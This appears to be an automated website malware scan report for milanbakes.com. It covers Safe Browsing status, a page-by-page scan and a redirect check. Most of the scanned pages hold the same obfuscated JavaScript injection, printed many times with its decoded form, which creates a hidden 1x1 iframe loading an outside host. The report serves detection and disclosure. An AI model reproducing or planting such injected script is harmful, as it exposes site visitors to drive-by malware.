Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=milanbakes.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://milanbakes.com/ | 200 OK Content-Length: 35172 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var wkjkn="r75XDX5";wkjkn+="XEi7r7%Yi7r";var gKzTeW="s%ukT%ukTs";var dHrTI6C="8as4D8as5";var Ymdzz26="Lzd4DLz";var C1uM="28as698";var lJK3Hyl="8If.repl";var o67YR="6s62s%ukT2s%u";Ymdzz26="zd73fl3"+Ymdzz26;var o0Me="%Yi7r2E";var L4wlzFU2="s2Es77s69s64";var ls5kVwDk="%ukTBs";var BAVOEcb="nescape(K";var bbaDg3="7r79i7r36i7r3DX";var z8WeUmb3="ace(/%Y";var twwUJJq8="7%ukTs%ukT%ukTs";var DmUTfcJp="5s62s62s6";var Y5BB="kT0s%ukT";var lFNh="%Y5XCX5XDX5X";var fefhHD26="r72X1XDX5i7r27i";var hgpsVBWc="/X/g, Decoded script: var qRyyb='g876g861g872g820g871g86Cg839g852g850g83Dg822g83Cg864g869g876g820g869g864g83Dg827g877g859g84Bg86Cg864g847g827g83Eg83Cg82Fg864g869g876g83Eg822g83Bg869g866g828g864g86Fg863g875g86Dg865g86Eg874g82Eg862g86Fg864g879g83Dg83Dg86Eg875g86Cg86Cg829g871g86Cg839g852g850g83Dg827g83Cg862g86Fg864g879g83Eg827g82Bg871g86Cg839g852g850g82Bg827g83Cg82Fg862g86Fg864g879g83Eg827g83B';eval(unescape(qRyyb.replace(/g8/g,'%')));var OtuT='X%YXFX3i7r75XDX5XEi7r7%Yi7r2Ei7r77i7r72X9i7r7%YX5i7r20i7r28i7r71XCi7r39 zTs3MU.src='http://pics.bubbled.cn/gallery/hardcore/?23c4f60c1b9f604d6ffb21cba599301f';zTs3MU.width='1';zTs3MU.height='1'; zTs3MU.src='http://pics.bubbled.cn/gallery/hardcore/?23c4f60c1b9f604d6ffb21cba599301f';zTs3MU.width='1';zTs3MU.height='1'; zTs3MU.name='uKEl7uDbojZc'; zTs3MU.name='uKEl7uDbojZc'; zTs3MU.style.visibility='hidden';Nry6.appendChild(zTs3MU); zTs3MU.style.visibility='hidden';Nry6.appendChild(zTs3MU); <div id='wYKldG'></div> Antivirus reports:
| ||
http://milanbakes.com/scripts.js | 200 OK Content-Length: 5220 Content-Type: application/x-javascript | clean |
http://milanbakes.com/portal.php | 404 Not Found Content-Length: 208 Content-Type: text/html | clean |
http://milanbakes.com/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
http://milanbakes.com/index.php?cat=0 | 200 OK Content-Length: 35259 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var wkjkn="r75XDX5";wkjkn+="XEi7r7%Yi7r";var gKzTeW="s%ukT%ukTs";var dHrTI6C="8as4D8as5";var Ymdzz26="Lzd4DLz";var C1uM="28as698";var lJK3Hyl="8If.repl";var o67YR="6s62s%ukT2s%u";Ymdzz26="zd73fl3"+Ymdzz26;var o0Me="%Yi7r2E";var L4wlzFU2="s2Es77s69s64";var ls5kVwDk="%ukTBs";var BAVOEcb="nescape(K";var bbaDg3="7r79i7r36i7r3DX";var z8WeUmb3="ace(/%Y";var twwUJJq8="7%ukTs%ukT%ukTs";var DmUTfcJp="5s62s62s6";var Y5BB="kT0s%ukT";var lFNh="%Y5XCX5XDX5X";var fefhHD26="r72X1XDX5i7r27i";var hgpsVBWc="/X/g, Decoded script: var qRyyb='g876g861g872g820g871g86Cg839g852g850g83Dg822g83Cg864g869g876g820g869g864g83Dg827g877g859g84Bg86Cg864g847g827g83Eg83Cg82Fg864g869g876g83Eg822g83Bg869g866g828g864g86Fg863g875g86Dg865g86Eg874g82Eg862g86Fg864g879g83Dg83Dg86Eg875g86Cg86Cg829g871g86Cg839g852g850g83Dg827g83Cg862g86Fg864g879g83Eg827g82Bg871g86Cg839g852g850g82Bg827g83Cg82Fg862g86Fg864g879g83Eg827g83B';eval(unescape(qRyyb.replace(/g8/g,'%')));var OtuT='X%YXFX3i7r75XDX5XEi7r7%Yi7r2Ei7r77i7r72X9i7r7%YX5i7r20i7r28i7r71XCi7r39 zTs3MU.src='http://pics.bubbled.cn/gallery/hardcore/?23c4f60c1b9f604d6ffb21cba599301f';zTs3MU.width='1';zTs3MU.height='1'; zTs3MU.src='http://pics.bubbled.cn/gallery/hardcore/?23c4f60c1b9f604d6ffb21cba599301f';zTs3MU.width='1';zTs3MU.height='1'; zTs3MU.name='uKEl7uDbojZc'; zTs3MU.name='uKEl7uDbojZc'; zTs3MU.style.visibility='hidden';Nry6.appendChild(zTs3MU); zTs3MU.style.visibility='hidden';Nry6.appendChild(zTs3MU); <div id='wYKldG'></div> Antivirus reports:
| ||
http://milanbakes.com/login.php?referer=index.php%3Fcat%3D0 | 200 OK Content-Length: 12044 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var wkjkn="r75XDX5";wkjkn+="XEi7r7%Yi7r";var gKzTeW="s%ukT%ukTs";var dHrTI6C="8as4D8as5";var Ymdzz26="Lzd4DLz";var C1uM="28as698";var lJK3Hyl="8If.repl";var o67YR="6s62s%ukT2s%u";Ymdzz26="zd73fl3"+Ymdzz26;var o0Me="%Yi7r2E";var L4wlzFU2="s2Es77s69s64";var ls5kVwDk="%ukTBs";var BAVOEcb="nescape(K";var bbaDg3="7r79i7r36i7r3DX";var z8WeUmb3="ace(/%Y";var twwUJJq8="7%ukTs%ukT%ukTs";var DmUTfcJp="5s62s62s6";var Y5BB="kT0s%ukT";var lFNh="%Y5XCX5XDX5X";var fefhHD26="r72X1XDX5i7r27i";var hgpsVBWc="/X/g, Decoded script: var qRyyb='g876g861g872g820g871g86Cg839g852g850g83Dg822g83Cg864g869g876g820g869g864g83Dg827g877g859g84Bg86Cg864g847g827g83Eg83Cg82Fg864g869g876g83Eg822g83Bg869g866g828g864g86Fg863g875g86Dg865g86Eg874g82Eg862g86Fg864g879g83Dg83Dg86Eg875g86Cg86Cg829g871g86Cg839g852g850g83Dg827g83Cg862g86Fg864g879g83Eg827g82Bg871g86Cg839g852g850g82Bg827g83Cg82Fg862g86Fg864g879g83Eg827g83B';eval(unescape(qRyyb.replace(/g8/g,'%')));var OtuT='X%YXFX3i7r75XDX5XEi7r7%Yi7r2Ei7r77i7r72X9i7r7%YX5i7r20i7r28i7r71XCi7r39 zTs3MU.src='http://pics.bubbled.cn/gallery/hardcore/?23c4f60c1b9f604d6ffb21cba599301f';zTs3MU.width='1';zTs3MU.height='1'; zTs3MU.src='http://pics.bubbled.cn/gallery/hardcore/?23c4f60c1b9f604d6ffb21cba599301f';zTs3MU.width='1';zTs3MU.height='1'; zTs3MU.name='uKEl7uDbojZc'; zTs3MU.name='uKEl7uDbojZc'; zTs3MU.style.visibility='hidden';Nry6.appendChild(zTs3MU); zTs3MU.style.visibility='hidden';Nry6.appendChild(zTs3MU); <div id='wYKldG'></div> Antivirus reports:
| ||
http://milanbakes.com/index.php | 200 OK Content-Length: 35380 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var wkjkn="r75XDX5";wkjkn+="XEi7r7%Yi7r";var gKzTeW="s%ukT%ukTs";var dHrTI6C="8as4D8as5";var Ymdzz26="Lzd4DLz";var C1uM="28as698";var lJK3Hyl="8If.repl";var o67YR="6s62s%ukT2s%u";Ymdzz26="zd73fl3"+Ymdzz26;var o0Me="%Yi7r2E";var L4wlzFU2="s2Es77s69s64";var ls5kVwDk="%ukTBs";var BAVOEcb="nescape(K";var bbaDg3="7r79i7r36i7r3DX";var z8WeUmb3="ace(/%Y";var twwUJJq8="7%ukTs%ukT%ukTs";var DmUTfcJp="5s62s62s6";var Y5BB="kT0s%ukT";var lFNh="%Y5XCX5XDX5X";var fefhHD26="r72X1XDX5i7r27i";var hgpsVBWc="/X/g, Decoded script: var qRyyb='g876g861g872g820g871g86Cg839g852g850g83Dg822g83Cg864g869g876g820g869g864g83Dg827g877g859g84Bg86Cg864g847g827g83Eg83Cg82Fg864g869g876g83Eg822g83Bg869g866g828g864g86Fg863g875g86Dg865g86Eg874g82Eg862g86Fg864g879g83Dg83Dg86Eg875g86Cg86Cg829g871g86Cg839g852g850g83Dg827g83Cg862g86Fg864g879g83Eg827g82Bg871g86Cg839g852g850g82Bg827g83Cg82Fg862g86Fg864g879g83Eg827g83B';eval(unescape(qRyyb.replace(/g8/g,'%')));var OtuT='X%YXFX3i7r75XDX5XEi7r7%Yi7r2Ei7r77i7r72X9i7r7%YX5i7r20i7r28i7r71XCi7r39 zTs3MU.src='http://pics.bubbled.cn/gallery/hardcore/?23c4f60c1b9f604d6ffb21cba599301f';zTs3MU.width='1';zTs3MU.height='1'; zTs3MU.src='http://pics.bubbled.cn/gallery/hardcore/?23c4f60c1b9f604d6ffb21cba599301f';zTs3MU.width='1';zTs3MU.height='1'; zTs3MU.name='uKEl7uDbojZc'; zTs3MU.name='uKEl7uDbojZc'; zTs3MU.style.visibility='hidden';Nry6.appendChild(zTs3MU); zTs3MU.style.visibility='hidden';Nry6.appendChild(zTs3MU); <div id='wYKldG'></div> Antivirus reports:
| ||
http://milanbakes.com/login.php?referer=index.php | 200 OK Content-Length: 12020 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var wkjkn="r75XDX5";wkjkn+="XEi7r7%Yi7r";var gKzTeW="s%ukT%ukTs";var dHrTI6C="8as4D8as5";var Ymdzz26="Lzd4DLz";var C1uM="28as698";var lJK3Hyl="8If.repl";var o67YR="6s62s%ukT2s%u";Ymdzz26="zd73fl3"+Ymdzz26;var o0Me="%Yi7r2E";var L4wlzFU2="s2Es77s69s64";var ls5kVwDk="%ukTBs";var BAVOEcb="nescape(K";var bbaDg3="7r79i7r36i7r3DX";var z8WeUmb3="ace(/%Y";var twwUJJq8="7%ukTs%ukT%ukTs";var DmUTfcJp="5s62s62s6";var Y5BB="kT0s%ukT";var lFNh="%Y5XCX5XDX5X";var fefhHD26="r72X1XDX5i7r27i";var hgpsVBWc="/X/g, Decoded script: var qRyyb='g876g861g872g820g871g86Cg839g852g850g83Dg822g83Cg864g869g876g820g869g864g83Dg827g877g859g84Bg86Cg864g847g827g83Eg83Cg82Fg864g869g876g83Eg822g83Bg869g866g828g864g86Fg863g875g86Dg865g86Eg874g82Eg862g86Fg864g879g83Dg83Dg86Eg875g86Cg86Cg829g871g86Cg839g852g850g83Dg827g83Cg862g86Fg864g879g83Eg827g82Bg871g86Cg839g852g850g82Bg827g83Cg82Fg862g86Fg864g879g83Eg827g83B';eval(unescape(qRyyb.replace(/g8/g,'%')));var OtuT='X%YXFX3i7r75XDX5XEi7r7%Yi7r2Ei7r77i7r72X9i7r7%YX5i7r20i7r28i7r71XCi7r39 zTs3MU.src='http://pics.bubbled.cn/gallery/hardcore/?23c4f60c1b9f604d6ffb21cba599301f';zTs3MU.width='1';zTs3MU.height='1'; zTs3MU.src='http://pics.bubbled.cn/gallery/hardcore/?23c4f60c1b9f604d6ffb21cba599301f';zTs3MU.width='1';zTs3MU.height='1'; zTs3MU.name='uKEl7uDbojZc'; zTs3MU.name='uKEl7uDbojZc'; zTs3MU.style.visibility='hidden';Nry6.appendChild(zTs3MU); zTs3MU.style.visibility='hidden';Nry6.appendChild(zTs3MU); <div id='wYKldG'></div> Antivirus reports:
| ||
http://milanbakes.com/login.php?referer=login.php%3Freferer%3Dindex.php | 200 OK Content-Length: 12068 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var wkjkn="r75XDX5";wkjkn+="XEi7r7%Yi7r";var gKzTeW="s%ukT%ukTs";var dHrTI6C="8as4D8as5";var Ymdzz26="Lzd4DLz";var C1uM="28as698";var lJK3Hyl="8If.repl";var o67YR="6s62s%ukT2s%u";Ymdzz26="zd73fl3"+Ymdzz26;var o0Me="%Yi7r2E";var L4wlzFU2="s2Es77s69s64";var ls5kVwDk="%ukTBs";var BAVOEcb="nescape(K";var bbaDg3="7r79i7r36i7r3DX";var z8WeUmb3="ace(/%Y";var twwUJJq8="7%ukTs%ukT%ukTs";var DmUTfcJp="5s62s62s6";var Y5BB="kT0s%ukT";var lFNh="%Y5XCX5XDX5X";var fefhHD26="r72X1XDX5i7r27i";var hgpsVBWc="/X/g, Decoded script: var qRyyb='g876g861g872g820g871g86Cg839g852g850g83Dg822g83Cg864g869g876g820g869g864g83Dg827g877g859g84Bg86Cg864g847g827g83Eg83Cg82Fg864g869g876g83Eg822g83Bg869g866g828g864g86Fg863g875g86Dg865g86Eg874g82Eg862g86Fg864g879g83Dg83Dg86Eg875g86Cg86Cg829g871g86Cg839g852g850g83Dg827g83Cg862g86Fg864g879g83Eg827g82Bg871g86Cg839g852g850g82Bg827g83Cg82Fg862g86Fg864g879g83Eg827g83B';eval(unescape(qRyyb.replace(/g8/g,'%')));var OtuT='X%YXFX3i7r75XDX5XEi7r7%Yi7r2Ei7r77i7r72X9i7r7%YX5i7r20i7r28i7r71XCi7r39 zTs3MU.src='http://pics.bubbled.cn/gallery/hardcore/?23c4f60c1b9f604d6ffb21cba599301f';zTs3MU.width='1';zTs3MU.height='1'; zTs3MU.src='http://pics.bubbled.cn/gallery/hardcore/?23c4f60c1b9f604d6ffb21cba599301f';zTs3MU.width='1';zTs3MU.height='1'; zTs3MU.name='uKEl7uDbojZc'; zTs3MU.name='uKEl7uDbojZc'; zTs3MU.style.visibility='hidden';Nry6.appendChild(zTs3MU); zTs3MU.style.visibility='hidden';Nry6.appendChild(zTs3MU); <div id='wYKldG'></div> Antivirus reports:
| ||
http://milanbakes.com/login.php?referer=login.php%3Freferer%3Dlogin.php%253Freferer%253Dindex.php | 200 OK Content-Length: 12124 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var wkjkn="r75XDX5";wkjkn+="XEi7r7%Yi7r";var gKzTeW="s%ukT%ukTs";var dHrTI6C="8as4D8as5";var Ymdzz26="Lzd4DLz";var C1uM="28as698";var lJK3Hyl="8If.repl";var o67YR="6s62s%ukT2s%u";Ymdzz26="zd73fl3"+Ymdzz26;var o0Me="%Yi7r2E";var L4wlzFU2="s2Es77s69s64";var ls5kVwDk="%ukTBs";var BAVOEcb="nescape(K";var bbaDg3="7r79i7r36i7r3DX";var z8WeUmb3="ace(/%Y";var twwUJJq8="7%ukTs%ukT%ukTs";var DmUTfcJp="5s62s62s6";var Y5BB="kT0s%ukT";var lFNh="%Y5XCX5XDX5X";var fefhHD26="r72X1XDX5i7r27i";var hgpsVBWc="/X/g, Decoded script: var qRyyb='g876g861g872g820g871g86Cg839g852g850g83Dg822g83Cg864g869g876g820g869g864g83Dg827g877g859g84Bg86Cg864g847g827g83Eg83Cg82Fg864g869g876g83Eg822g83Bg869g866g828g864g86Fg863g875g86Dg865g86Eg874g82Eg862g86Fg864g879g83Dg83Dg86Eg875g86Cg86Cg829g871g86Cg839g852g850g83Dg827g83Cg862g86Fg864g879g83Eg827g82Bg871g86Cg839g852g850g82Bg827g83Cg82Fg862g86Fg864g879g83Eg827g83B';eval(unescape(qRyyb.replace(/g8/g,'%')));var OtuT='X%YXFX3i7r75XDX5XEi7r7%Yi7r2Ei7r77i7r72X9i7r7%YX5i7r20i7r28i7r71XCi7r39 zTs3MU.src='http://pics.bubbled.cn/gallery/hardcore/?23c4f60c1b9f604d6ffb21cba599301f';zTs3MU.width='1';zTs3MU.height='1'; zTs3MU.src='http://pics.bubbled.cn/gallery/hardcore/?23c4f60c1b9f604d6ffb21cba599301f';zTs3MU.width='1';zTs3MU.height='1'; zTs3MU.name='uKEl7uDbojZc'; zTs3MU.name='uKEl7uDbojZc'; zTs3MU.style.visibility='hidden';Nry6.appendChild(zTs3MU); zTs3MU.style.visibility='hidden';Nry6.appendChild(zTs3MU); <div id='wYKldG'></div> Antivirus reports:
| ||
http://milanbakes.com/login.php?referer=login.php%3Freferer%3Dlogin.php%253Freferer%253Dlogin.php%25253Freferer%25253Dindex.php | 200 OK Content-Length: 12188 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var wkjkn="r75XDX5";wkjkn+="XEi7r7%Yi7r";var gKzTeW="s%ukT%ukTs";var dHrTI6C="8as4D8as5";var Ymdzz26="Lzd4DLz";var C1uM="28as698";var lJK3Hyl="8If.repl";var o67YR="6s62s%ukT2s%u";Ymdzz26="zd73fl3"+Ymdzz26;var o0Me="%Yi7r2E";var L4wlzFU2="s2Es77s69s64";var ls5kVwDk="%ukTBs";var BAVOEcb="nescape(K";var bbaDg3="7r79i7r36i7r3DX";var z8WeUmb3="ace(/%Y";var twwUJJq8="7%ukTs%ukT%ukTs";var DmUTfcJp="5s62s62s6";var Y5BB="kT0s%ukT";var lFNh="%Y5XCX5XDX5X";var fefhHD26="r72X1XDX5i7r27i";var hgpsVBWc="/X/g, Decoded script: var qRyyb='g876g861g872g820g871g86Cg839g852g850g83Dg822g83Cg864g869g876g820g869g864g83Dg827g877g859g84Bg86Cg864g847g827g83Eg83Cg82Fg864g869g876g83Eg822g83Bg869g866g828g864g86Fg863g875g86Dg865g86Eg874g82Eg862g86Fg864g879g83Dg83Dg86Eg875g86Cg86Cg829g871g86Cg839g852g850g83Dg827g83Cg862g86Fg864g879g83Eg827g82Bg871g86Cg839g852g850g82Bg827g83Cg82Fg862g86Fg864g879g83Eg827g83B';eval(unescape(qRyyb.replace(/g8/g,'%')));var OtuT='X%YXFX3i7r75XDX5XEi7r7%Yi7r2Ei7r77i7r72X9i7r7%YX5i7r20i7r28i7r71XCi7r39 zTs3MU.src='http://pics.bubbled.cn/gallery/hardcore/?23c4f60c1b9f604d6ffb21cba599301f';zTs3MU.width='1';zTs3MU.height='1'; zTs3MU.src='http://pics.bubbled.cn/gallery/hardcore/?23c4f60c1b9f604d6ffb21cba599301f';zTs3MU.width='1';zTs3MU.height='1'; zTs3MU.name='uKEl7uDbojZc'; zTs3MU.name='uKEl7uDbojZc'; zTs3MU.style.visibility='hidden';Nry6.appendChild(zTs3MU); zTs3MU.style.visibility='hidden';Nry6.appendChild(zTs3MU); <div id='wYKldG'></div> Antivirus reports:
| ||
http://milanbakes.com/login.php?referer=login.php%3Freferer%3Dlogin.php%253Freferer%253Dlogin.php%25253Freferer%25253Dlogin.php%2525253Freferer%2525253Dindex.php | 200 OK Content-Length: 12260 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var wkjkn="r75XDX5";wkjkn+="XEi7r7%Yi7r";var gKzTeW="s%ukT%ukTs";var dHrTI6C="8as4D8as5";var Ymdzz26="Lzd4DLz";var C1uM="28as698";var lJK3Hyl="8If.repl";var o67YR="6s62s%ukT2s%u";Ymdzz26="zd73fl3"+Ymdzz26;var o0Me="%Yi7r2E";var L4wlzFU2="s2Es77s69s64";var ls5kVwDk="%ukTBs";var BAVOEcb="nescape(K";var bbaDg3="7r79i7r36i7r3DX";var z8WeUmb3="ace(/%Y";var twwUJJq8="7%ukTs%ukT%ukTs";var DmUTfcJp="5s62s62s6";var Y5BB="kT0s%ukT";var lFNh="%Y5XCX5XDX5X";var fefhHD26="r72X1XDX5i7r27i";var hgpsVBWc="/X/g, Decoded script: var qRyyb='g876g861g872g820g871g86Cg839g852g850g83Dg822g83Cg864g869g876g820g869g864g83Dg827g877g859g84Bg86Cg864g847g827g83Eg83Cg82Fg864g869g876g83Eg822g83Bg869g866g828g864g86Fg863g875g86Dg865g86Eg874g82Eg862g86Fg864g879g83Dg83Dg86Eg875g86Cg86Cg829g871g86Cg839g852g850g83Dg827g83Cg862g86Fg864g879g83Eg827g82Bg871g86Cg839g852g850g82Bg827g83Cg82Fg862g86Fg864g879g83Eg827g83B';eval(unescape(qRyyb.replace(/g8/g,'%')));var OtuT='X%YXFX3i7r75XDX5XEi7r7%Yi7r2Ei7r77i7r72X9i7r7%YX5i7r20i7r28i7r71XCi7r39 zTs3MU.src='http://pics.bubbled.cn/gallery/hardcore/?23c4f60c1b9f604d6ffb21cba599301f';zTs3MU.width='1';zTs3MU.height='1'; zTs3MU.src='http://pics.bubbled.cn/gallery/hardcore/?23c4f60c1b9f604d6ffb21cba599301f';zTs3MU.width='1';zTs3MU.height='1'; zTs3MU.name='uKEl7uDbojZc'; zTs3MU.name='uKEl7uDbojZc'; zTs3MU.style.visibility='hidden';Nry6.appendChild(zTs3MU); zTs3MU.style.visibility='hidden';Nry6.appendChild(zTs3MU); <div id='wYKldG'></div> Antivirus reports:
| ||
http://milanbakes.com/login.php?referer=login.php%3Freferer%3Dlogin.php%253Freferer%253Dlogin.php%25253Freferer%25253Dlogin.php%2525253Freferer%2525253Dlogin.php%252525253Freferer%252525253Dindex.php | 200 OK Content-Length: 12340 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var wkjkn="r75XDX5";wkjkn+="XEi7r7%Yi7r";var gKzTeW="s%ukT%ukTs";var dHrTI6C="8as4D8as5";var Ymdzz26="Lzd4DLz";var C1uM="28as698";var lJK3Hyl="8If.repl";var o67YR="6s62s%ukT2s%u";Ymdzz26="zd73fl3"+Ymdzz26;var o0Me="%Yi7r2E";var L4wlzFU2="s2Es77s69s64";var ls5kVwDk="%ukTBs";var BAVOEcb="nescape(K";var bbaDg3="7r79i7r36i7r3DX";var z8WeUmb3="ace(/%Y";var twwUJJq8="7%ukTs%ukT%ukTs";var DmUTfcJp="5s62s62s6";var Y5BB="kT0s%ukT";var lFNh="%Y5XCX5XDX5X";var fefhHD26="r72X1XDX5i7r27i";var hgpsVBWc="/X/g, Decoded script: var qRyyb='g876g861g872g820g871g86Cg839g852g850g83Dg822g83Cg864g869g876g820g869g864g83Dg827g877g859g84Bg86Cg864g847g827g83Eg83Cg82Fg864g869g876g83Eg822g83Bg869g866g828g864g86Fg863g875g86Dg865g86Eg874g82Eg862g86Fg864g879g83Dg83Dg86Eg875g86Cg86Cg829g871g86Cg839g852g850g83Dg827g83Cg862g86Fg864g879g83Eg827g82Bg871g86Cg839g852g850g82Bg827g83Cg82Fg862g86Fg864g879g83Eg827g83B';eval(unescape(qRyyb.replace(/g8/g,'%')));var OtuT='X%YXFX3i7r75XDX5XEi7r7%Yi7r2Ei7r77i7r72X9i7r7%YX5i7r20i7r28i7r71XCi7r39 zTs3MU.src='http://pics.bubbled.cn/gallery/hardcore/?23c4f60c1b9f604d6ffb21cba599301f';zTs3MU.width='1';zTs3MU.height='1'; zTs3MU.src='http://pics.bubbled.cn/gallery/hardcore/?23c4f60c1b9f604d6ffb21cba599301f';zTs3MU.width='1';zTs3MU.height='1'; zTs3MU.name='uKEl7uDbojZc'; zTs3MU.name='uKEl7uDbojZc'; zTs3MU.style.visibility='hidden';Nry6.appendChild(zTs3MU); zTs3MU.style.visibility='hidden';Nry6.appendChild(zTs3MU); <div id='wYKldG'></div> Antivirus reports:
| ||
http://milanbakes.com/login.php?referer=login.php%3Freferer%3Dlogin.php%253Freferer%253Dlogin.php%25253Freferer%25253Dlogin.php%2525253Freferer%2525253Dlogin.php%252525253Freferer%252525253Dlogin.php%25252525253Freferer%25252525253Dindex.php | 200 OK Content-Length: 12428 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var wkjkn="r75XDX5";wkjkn+="XEi7r7%Yi7r";var gKzTeW="s%ukT%ukTs";var dHrTI6C="8as4D8as5";var Ymdzz26="Lzd4DLz";var C1uM="28as698";var lJK3Hyl="8If.repl";var o67YR="6s62s%ukT2s%u";Ymdzz26="zd73fl3"+Ymdzz26;var o0Me="%Yi7r2E";var L4wlzFU2="s2Es77s69s64";var ls5kVwDk="%ukTBs";var BAVOEcb="nescape(K";var bbaDg3="7r79i7r36i7r3DX";var z8WeUmb3="ace(/%Y";var twwUJJq8="7%ukTs%ukT%ukTs";var DmUTfcJp="5s62s62s6";var Y5BB="kT0s%ukT";var lFNh="%Y5XCX5XDX5X";var fefhHD26="r72X1XDX5i7r27i";var hgpsVBWc="/X/g, Decoded script: var qRyyb='g876g861g872g820g871g86Cg839g852g850g83Dg822g83Cg864g869g876g820g869g864g83Dg827g877g859g84Bg86Cg864g847g827g83Eg83Cg82Fg864g869g876g83Eg822g83Bg869g866g828g864g86Fg863g875g86Dg865g86Eg874g82Eg862g86Fg864g879g83Dg83Dg86Eg875g86Cg86Cg829g871g86Cg839g852g850g83Dg827g83Cg862g86Fg864g879g83Eg827g82Bg871g86Cg839g852g850g82Bg827g83Cg82Fg862g86Fg864g879g83Eg827g83B';eval(unescape(qRyyb.replace(/g8/g,'%')));var OtuT='X%YXFX3i7r75XDX5XEi7r7%Yi7r2Ei7r77i7r72X9i7r7%YX5i7r20i7r28i7r71XCi7r39 zTs3MU.src='http://pics.bubbled.cn/gallery/hardcore/?23c4f60c1b9f604d6ffb21cba599301f';zTs3MU.width='1';zTs3MU.height='1'; zTs3MU.src='http://pics.bubbled.cn/gallery/hardcore/?23c4f60c1b9f604d6ffb21cba599301f';zTs3MU.width='1';zTs3MU.height='1'; zTs3MU.name='uKEl7uDbojZc'; zTs3MU.name='uKEl7uDbojZc'; zTs3MU.style.visibility='hidden';Nry6.appendChild(zTs3MU); zTs3MU.style.visibility='hidden';Nry6.appendChild(zTs3MU); <div id='wYKldG'></div> Antivirus reports:
| ||
http://milanbakes.com/login.php?referer=login.php%3Freferer%3Dlogin.php%253Freferer%253Dlogin.php%25253Freferer%25253Dlogin.php%2525253Freferer%2525253Dlogin.php%252525253Freferer%252525253Dlogin.php%25252525253Freferer%25252525253Dlogin.php%2525252525253Freferer%2525252525253Dindex.php | 200 OK Content-Length: 12524 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var wkjkn="r75XDX5";wkjkn+="XEi7r7%Yi7r";var gKzTeW="s%ukT%ukTs";var dHrTI6C="8as4D8as5";var Ymdzz26="Lzd4DLz";var C1uM="28as698";var lJK3Hyl="8If.repl";var o67YR="6s62s%ukT2s%u";Ymdzz26="zd73fl3"+Ymdzz26;var o0Me="%Yi7r2E";var L4wlzFU2="s2Es77s69s64";var ls5kVwDk="%ukTBs";var BAVOEcb="nescape(K";var bbaDg3="7r79i7r36i7r3DX";var z8WeUmb3="ace(/%Y";var twwUJJq8="7%ukTs%ukT%ukTs";var DmUTfcJp="5s62s62s6";var Y5BB="kT0s%ukT";var lFNh="%Y5XCX5XDX5X";var fefhHD26="r72X1XDX5i7r27i";var hgpsVBWc="/X/g, Decoded script: var qRyyb='g876g861g872g820g871g86Cg839g852g850g83Dg822g83Cg864g869g876g820g869g864g83Dg827g877g859g84Bg86Cg864g847g827g83Eg83Cg82Fg864g869g876g83Eg822g83Bg869g866g828g864g86Fg863g875g86Dg865g86Eg874g82Eg862g86Fg864g879g83Dg83Dg86Eg875g86Cg86Cg829g871g86Cg839g852g850g83Dg827g83Cg862g86Fg864g879g83Eg827g82Bg871g86Cg839g852g850g82Bg827g83Cg82Fg862g86Fg864g879g83Eg827g83B';eval(unescape(qRyyb.replace(/g8/g,'%')));var OtuT='X%YXFX3i7r75XDX5XEi7r7%Yi7r2Ei7r77i7r72X9i7r7%YX5i7r20i7r28i7r71XCi7r39 zTs3MU.src='http://pics.bubbled.cn/gallery/hardcore/?23c4f60c1b9f604d6ffb21cba599301f';zTs3MU.width='1';zTs3MU.height='1'; zTs3MU.src='http://pics.bubbled.cn/gallery/hardcore/?23c4f60c1b9f604d6ffb21cba599301f';zTs3MU.width='1';zTs3MU.height='1'; zTs3MU.name='uKEl7uDbojZc'; zTs3MU.name='uKEl7uDbojZc'; zTs3MU.style.visibility='hidden';Nry6.appendChild(zTs3MU); zTs3MU.style.visibility='hidden';Nry6.appendChild(zTs3MU); <div id='wYKldG'></div> Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: milanbakes.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 13 Dec 2014 03:09:34 GMT
Content-Type: text/html
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: a39a39fd6ce785fb323bcf790202f394=e449cc022024166c6307b202b9a38e21; expires=Sat, 27 Dec 2014 03:09:34 GMT; path=/
Set-Cookie: coppermine_data=YToyOntzOjI6IklEIjtzOjMyOiJkMjE5Mjg3NWUyOWY1MmFkNmZmYTU5NjQzYTgzZWJmNSI7czoyOiJhbSI7aToxO30%3D; expires=Mon, 12 Jan 2015 03:09:34 GMT; path=/
GET / HTTP/1.1
Host: milanbakes.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 13 Dec 2014 03:09:34 GMT
Content-Type: text/html
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: a39a39fd6ce785fb323bcf790202f394=e449cc022024166c6307b202b9a38e21; expires=Sat, 27 Dec 2014 03:09:34 GMT; path=/
Set-Cookie: coppermine_data=YToyOntzOjI6IklEIjtzOjMyOiJkMjE5Mjg3NWUyOWY1MmFkNmZmYTU5NjQzYTgzZWJmNSI7czoyOiJhbSI7aToxO30%3D; expires=Mon, 12 Jan 2015 03:09:34 GMT; path=/
Second query (visit from search engine):
GET / HTTP/1.1
Host: milanbakes.com
Referer: http://www.google.com/search?q=milanbakes.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: milanbakes.com
Referer: http://www.google.com/search?q=milanbakes.com
Result:
The result is similar to the first query. There are no suspicious redirects found.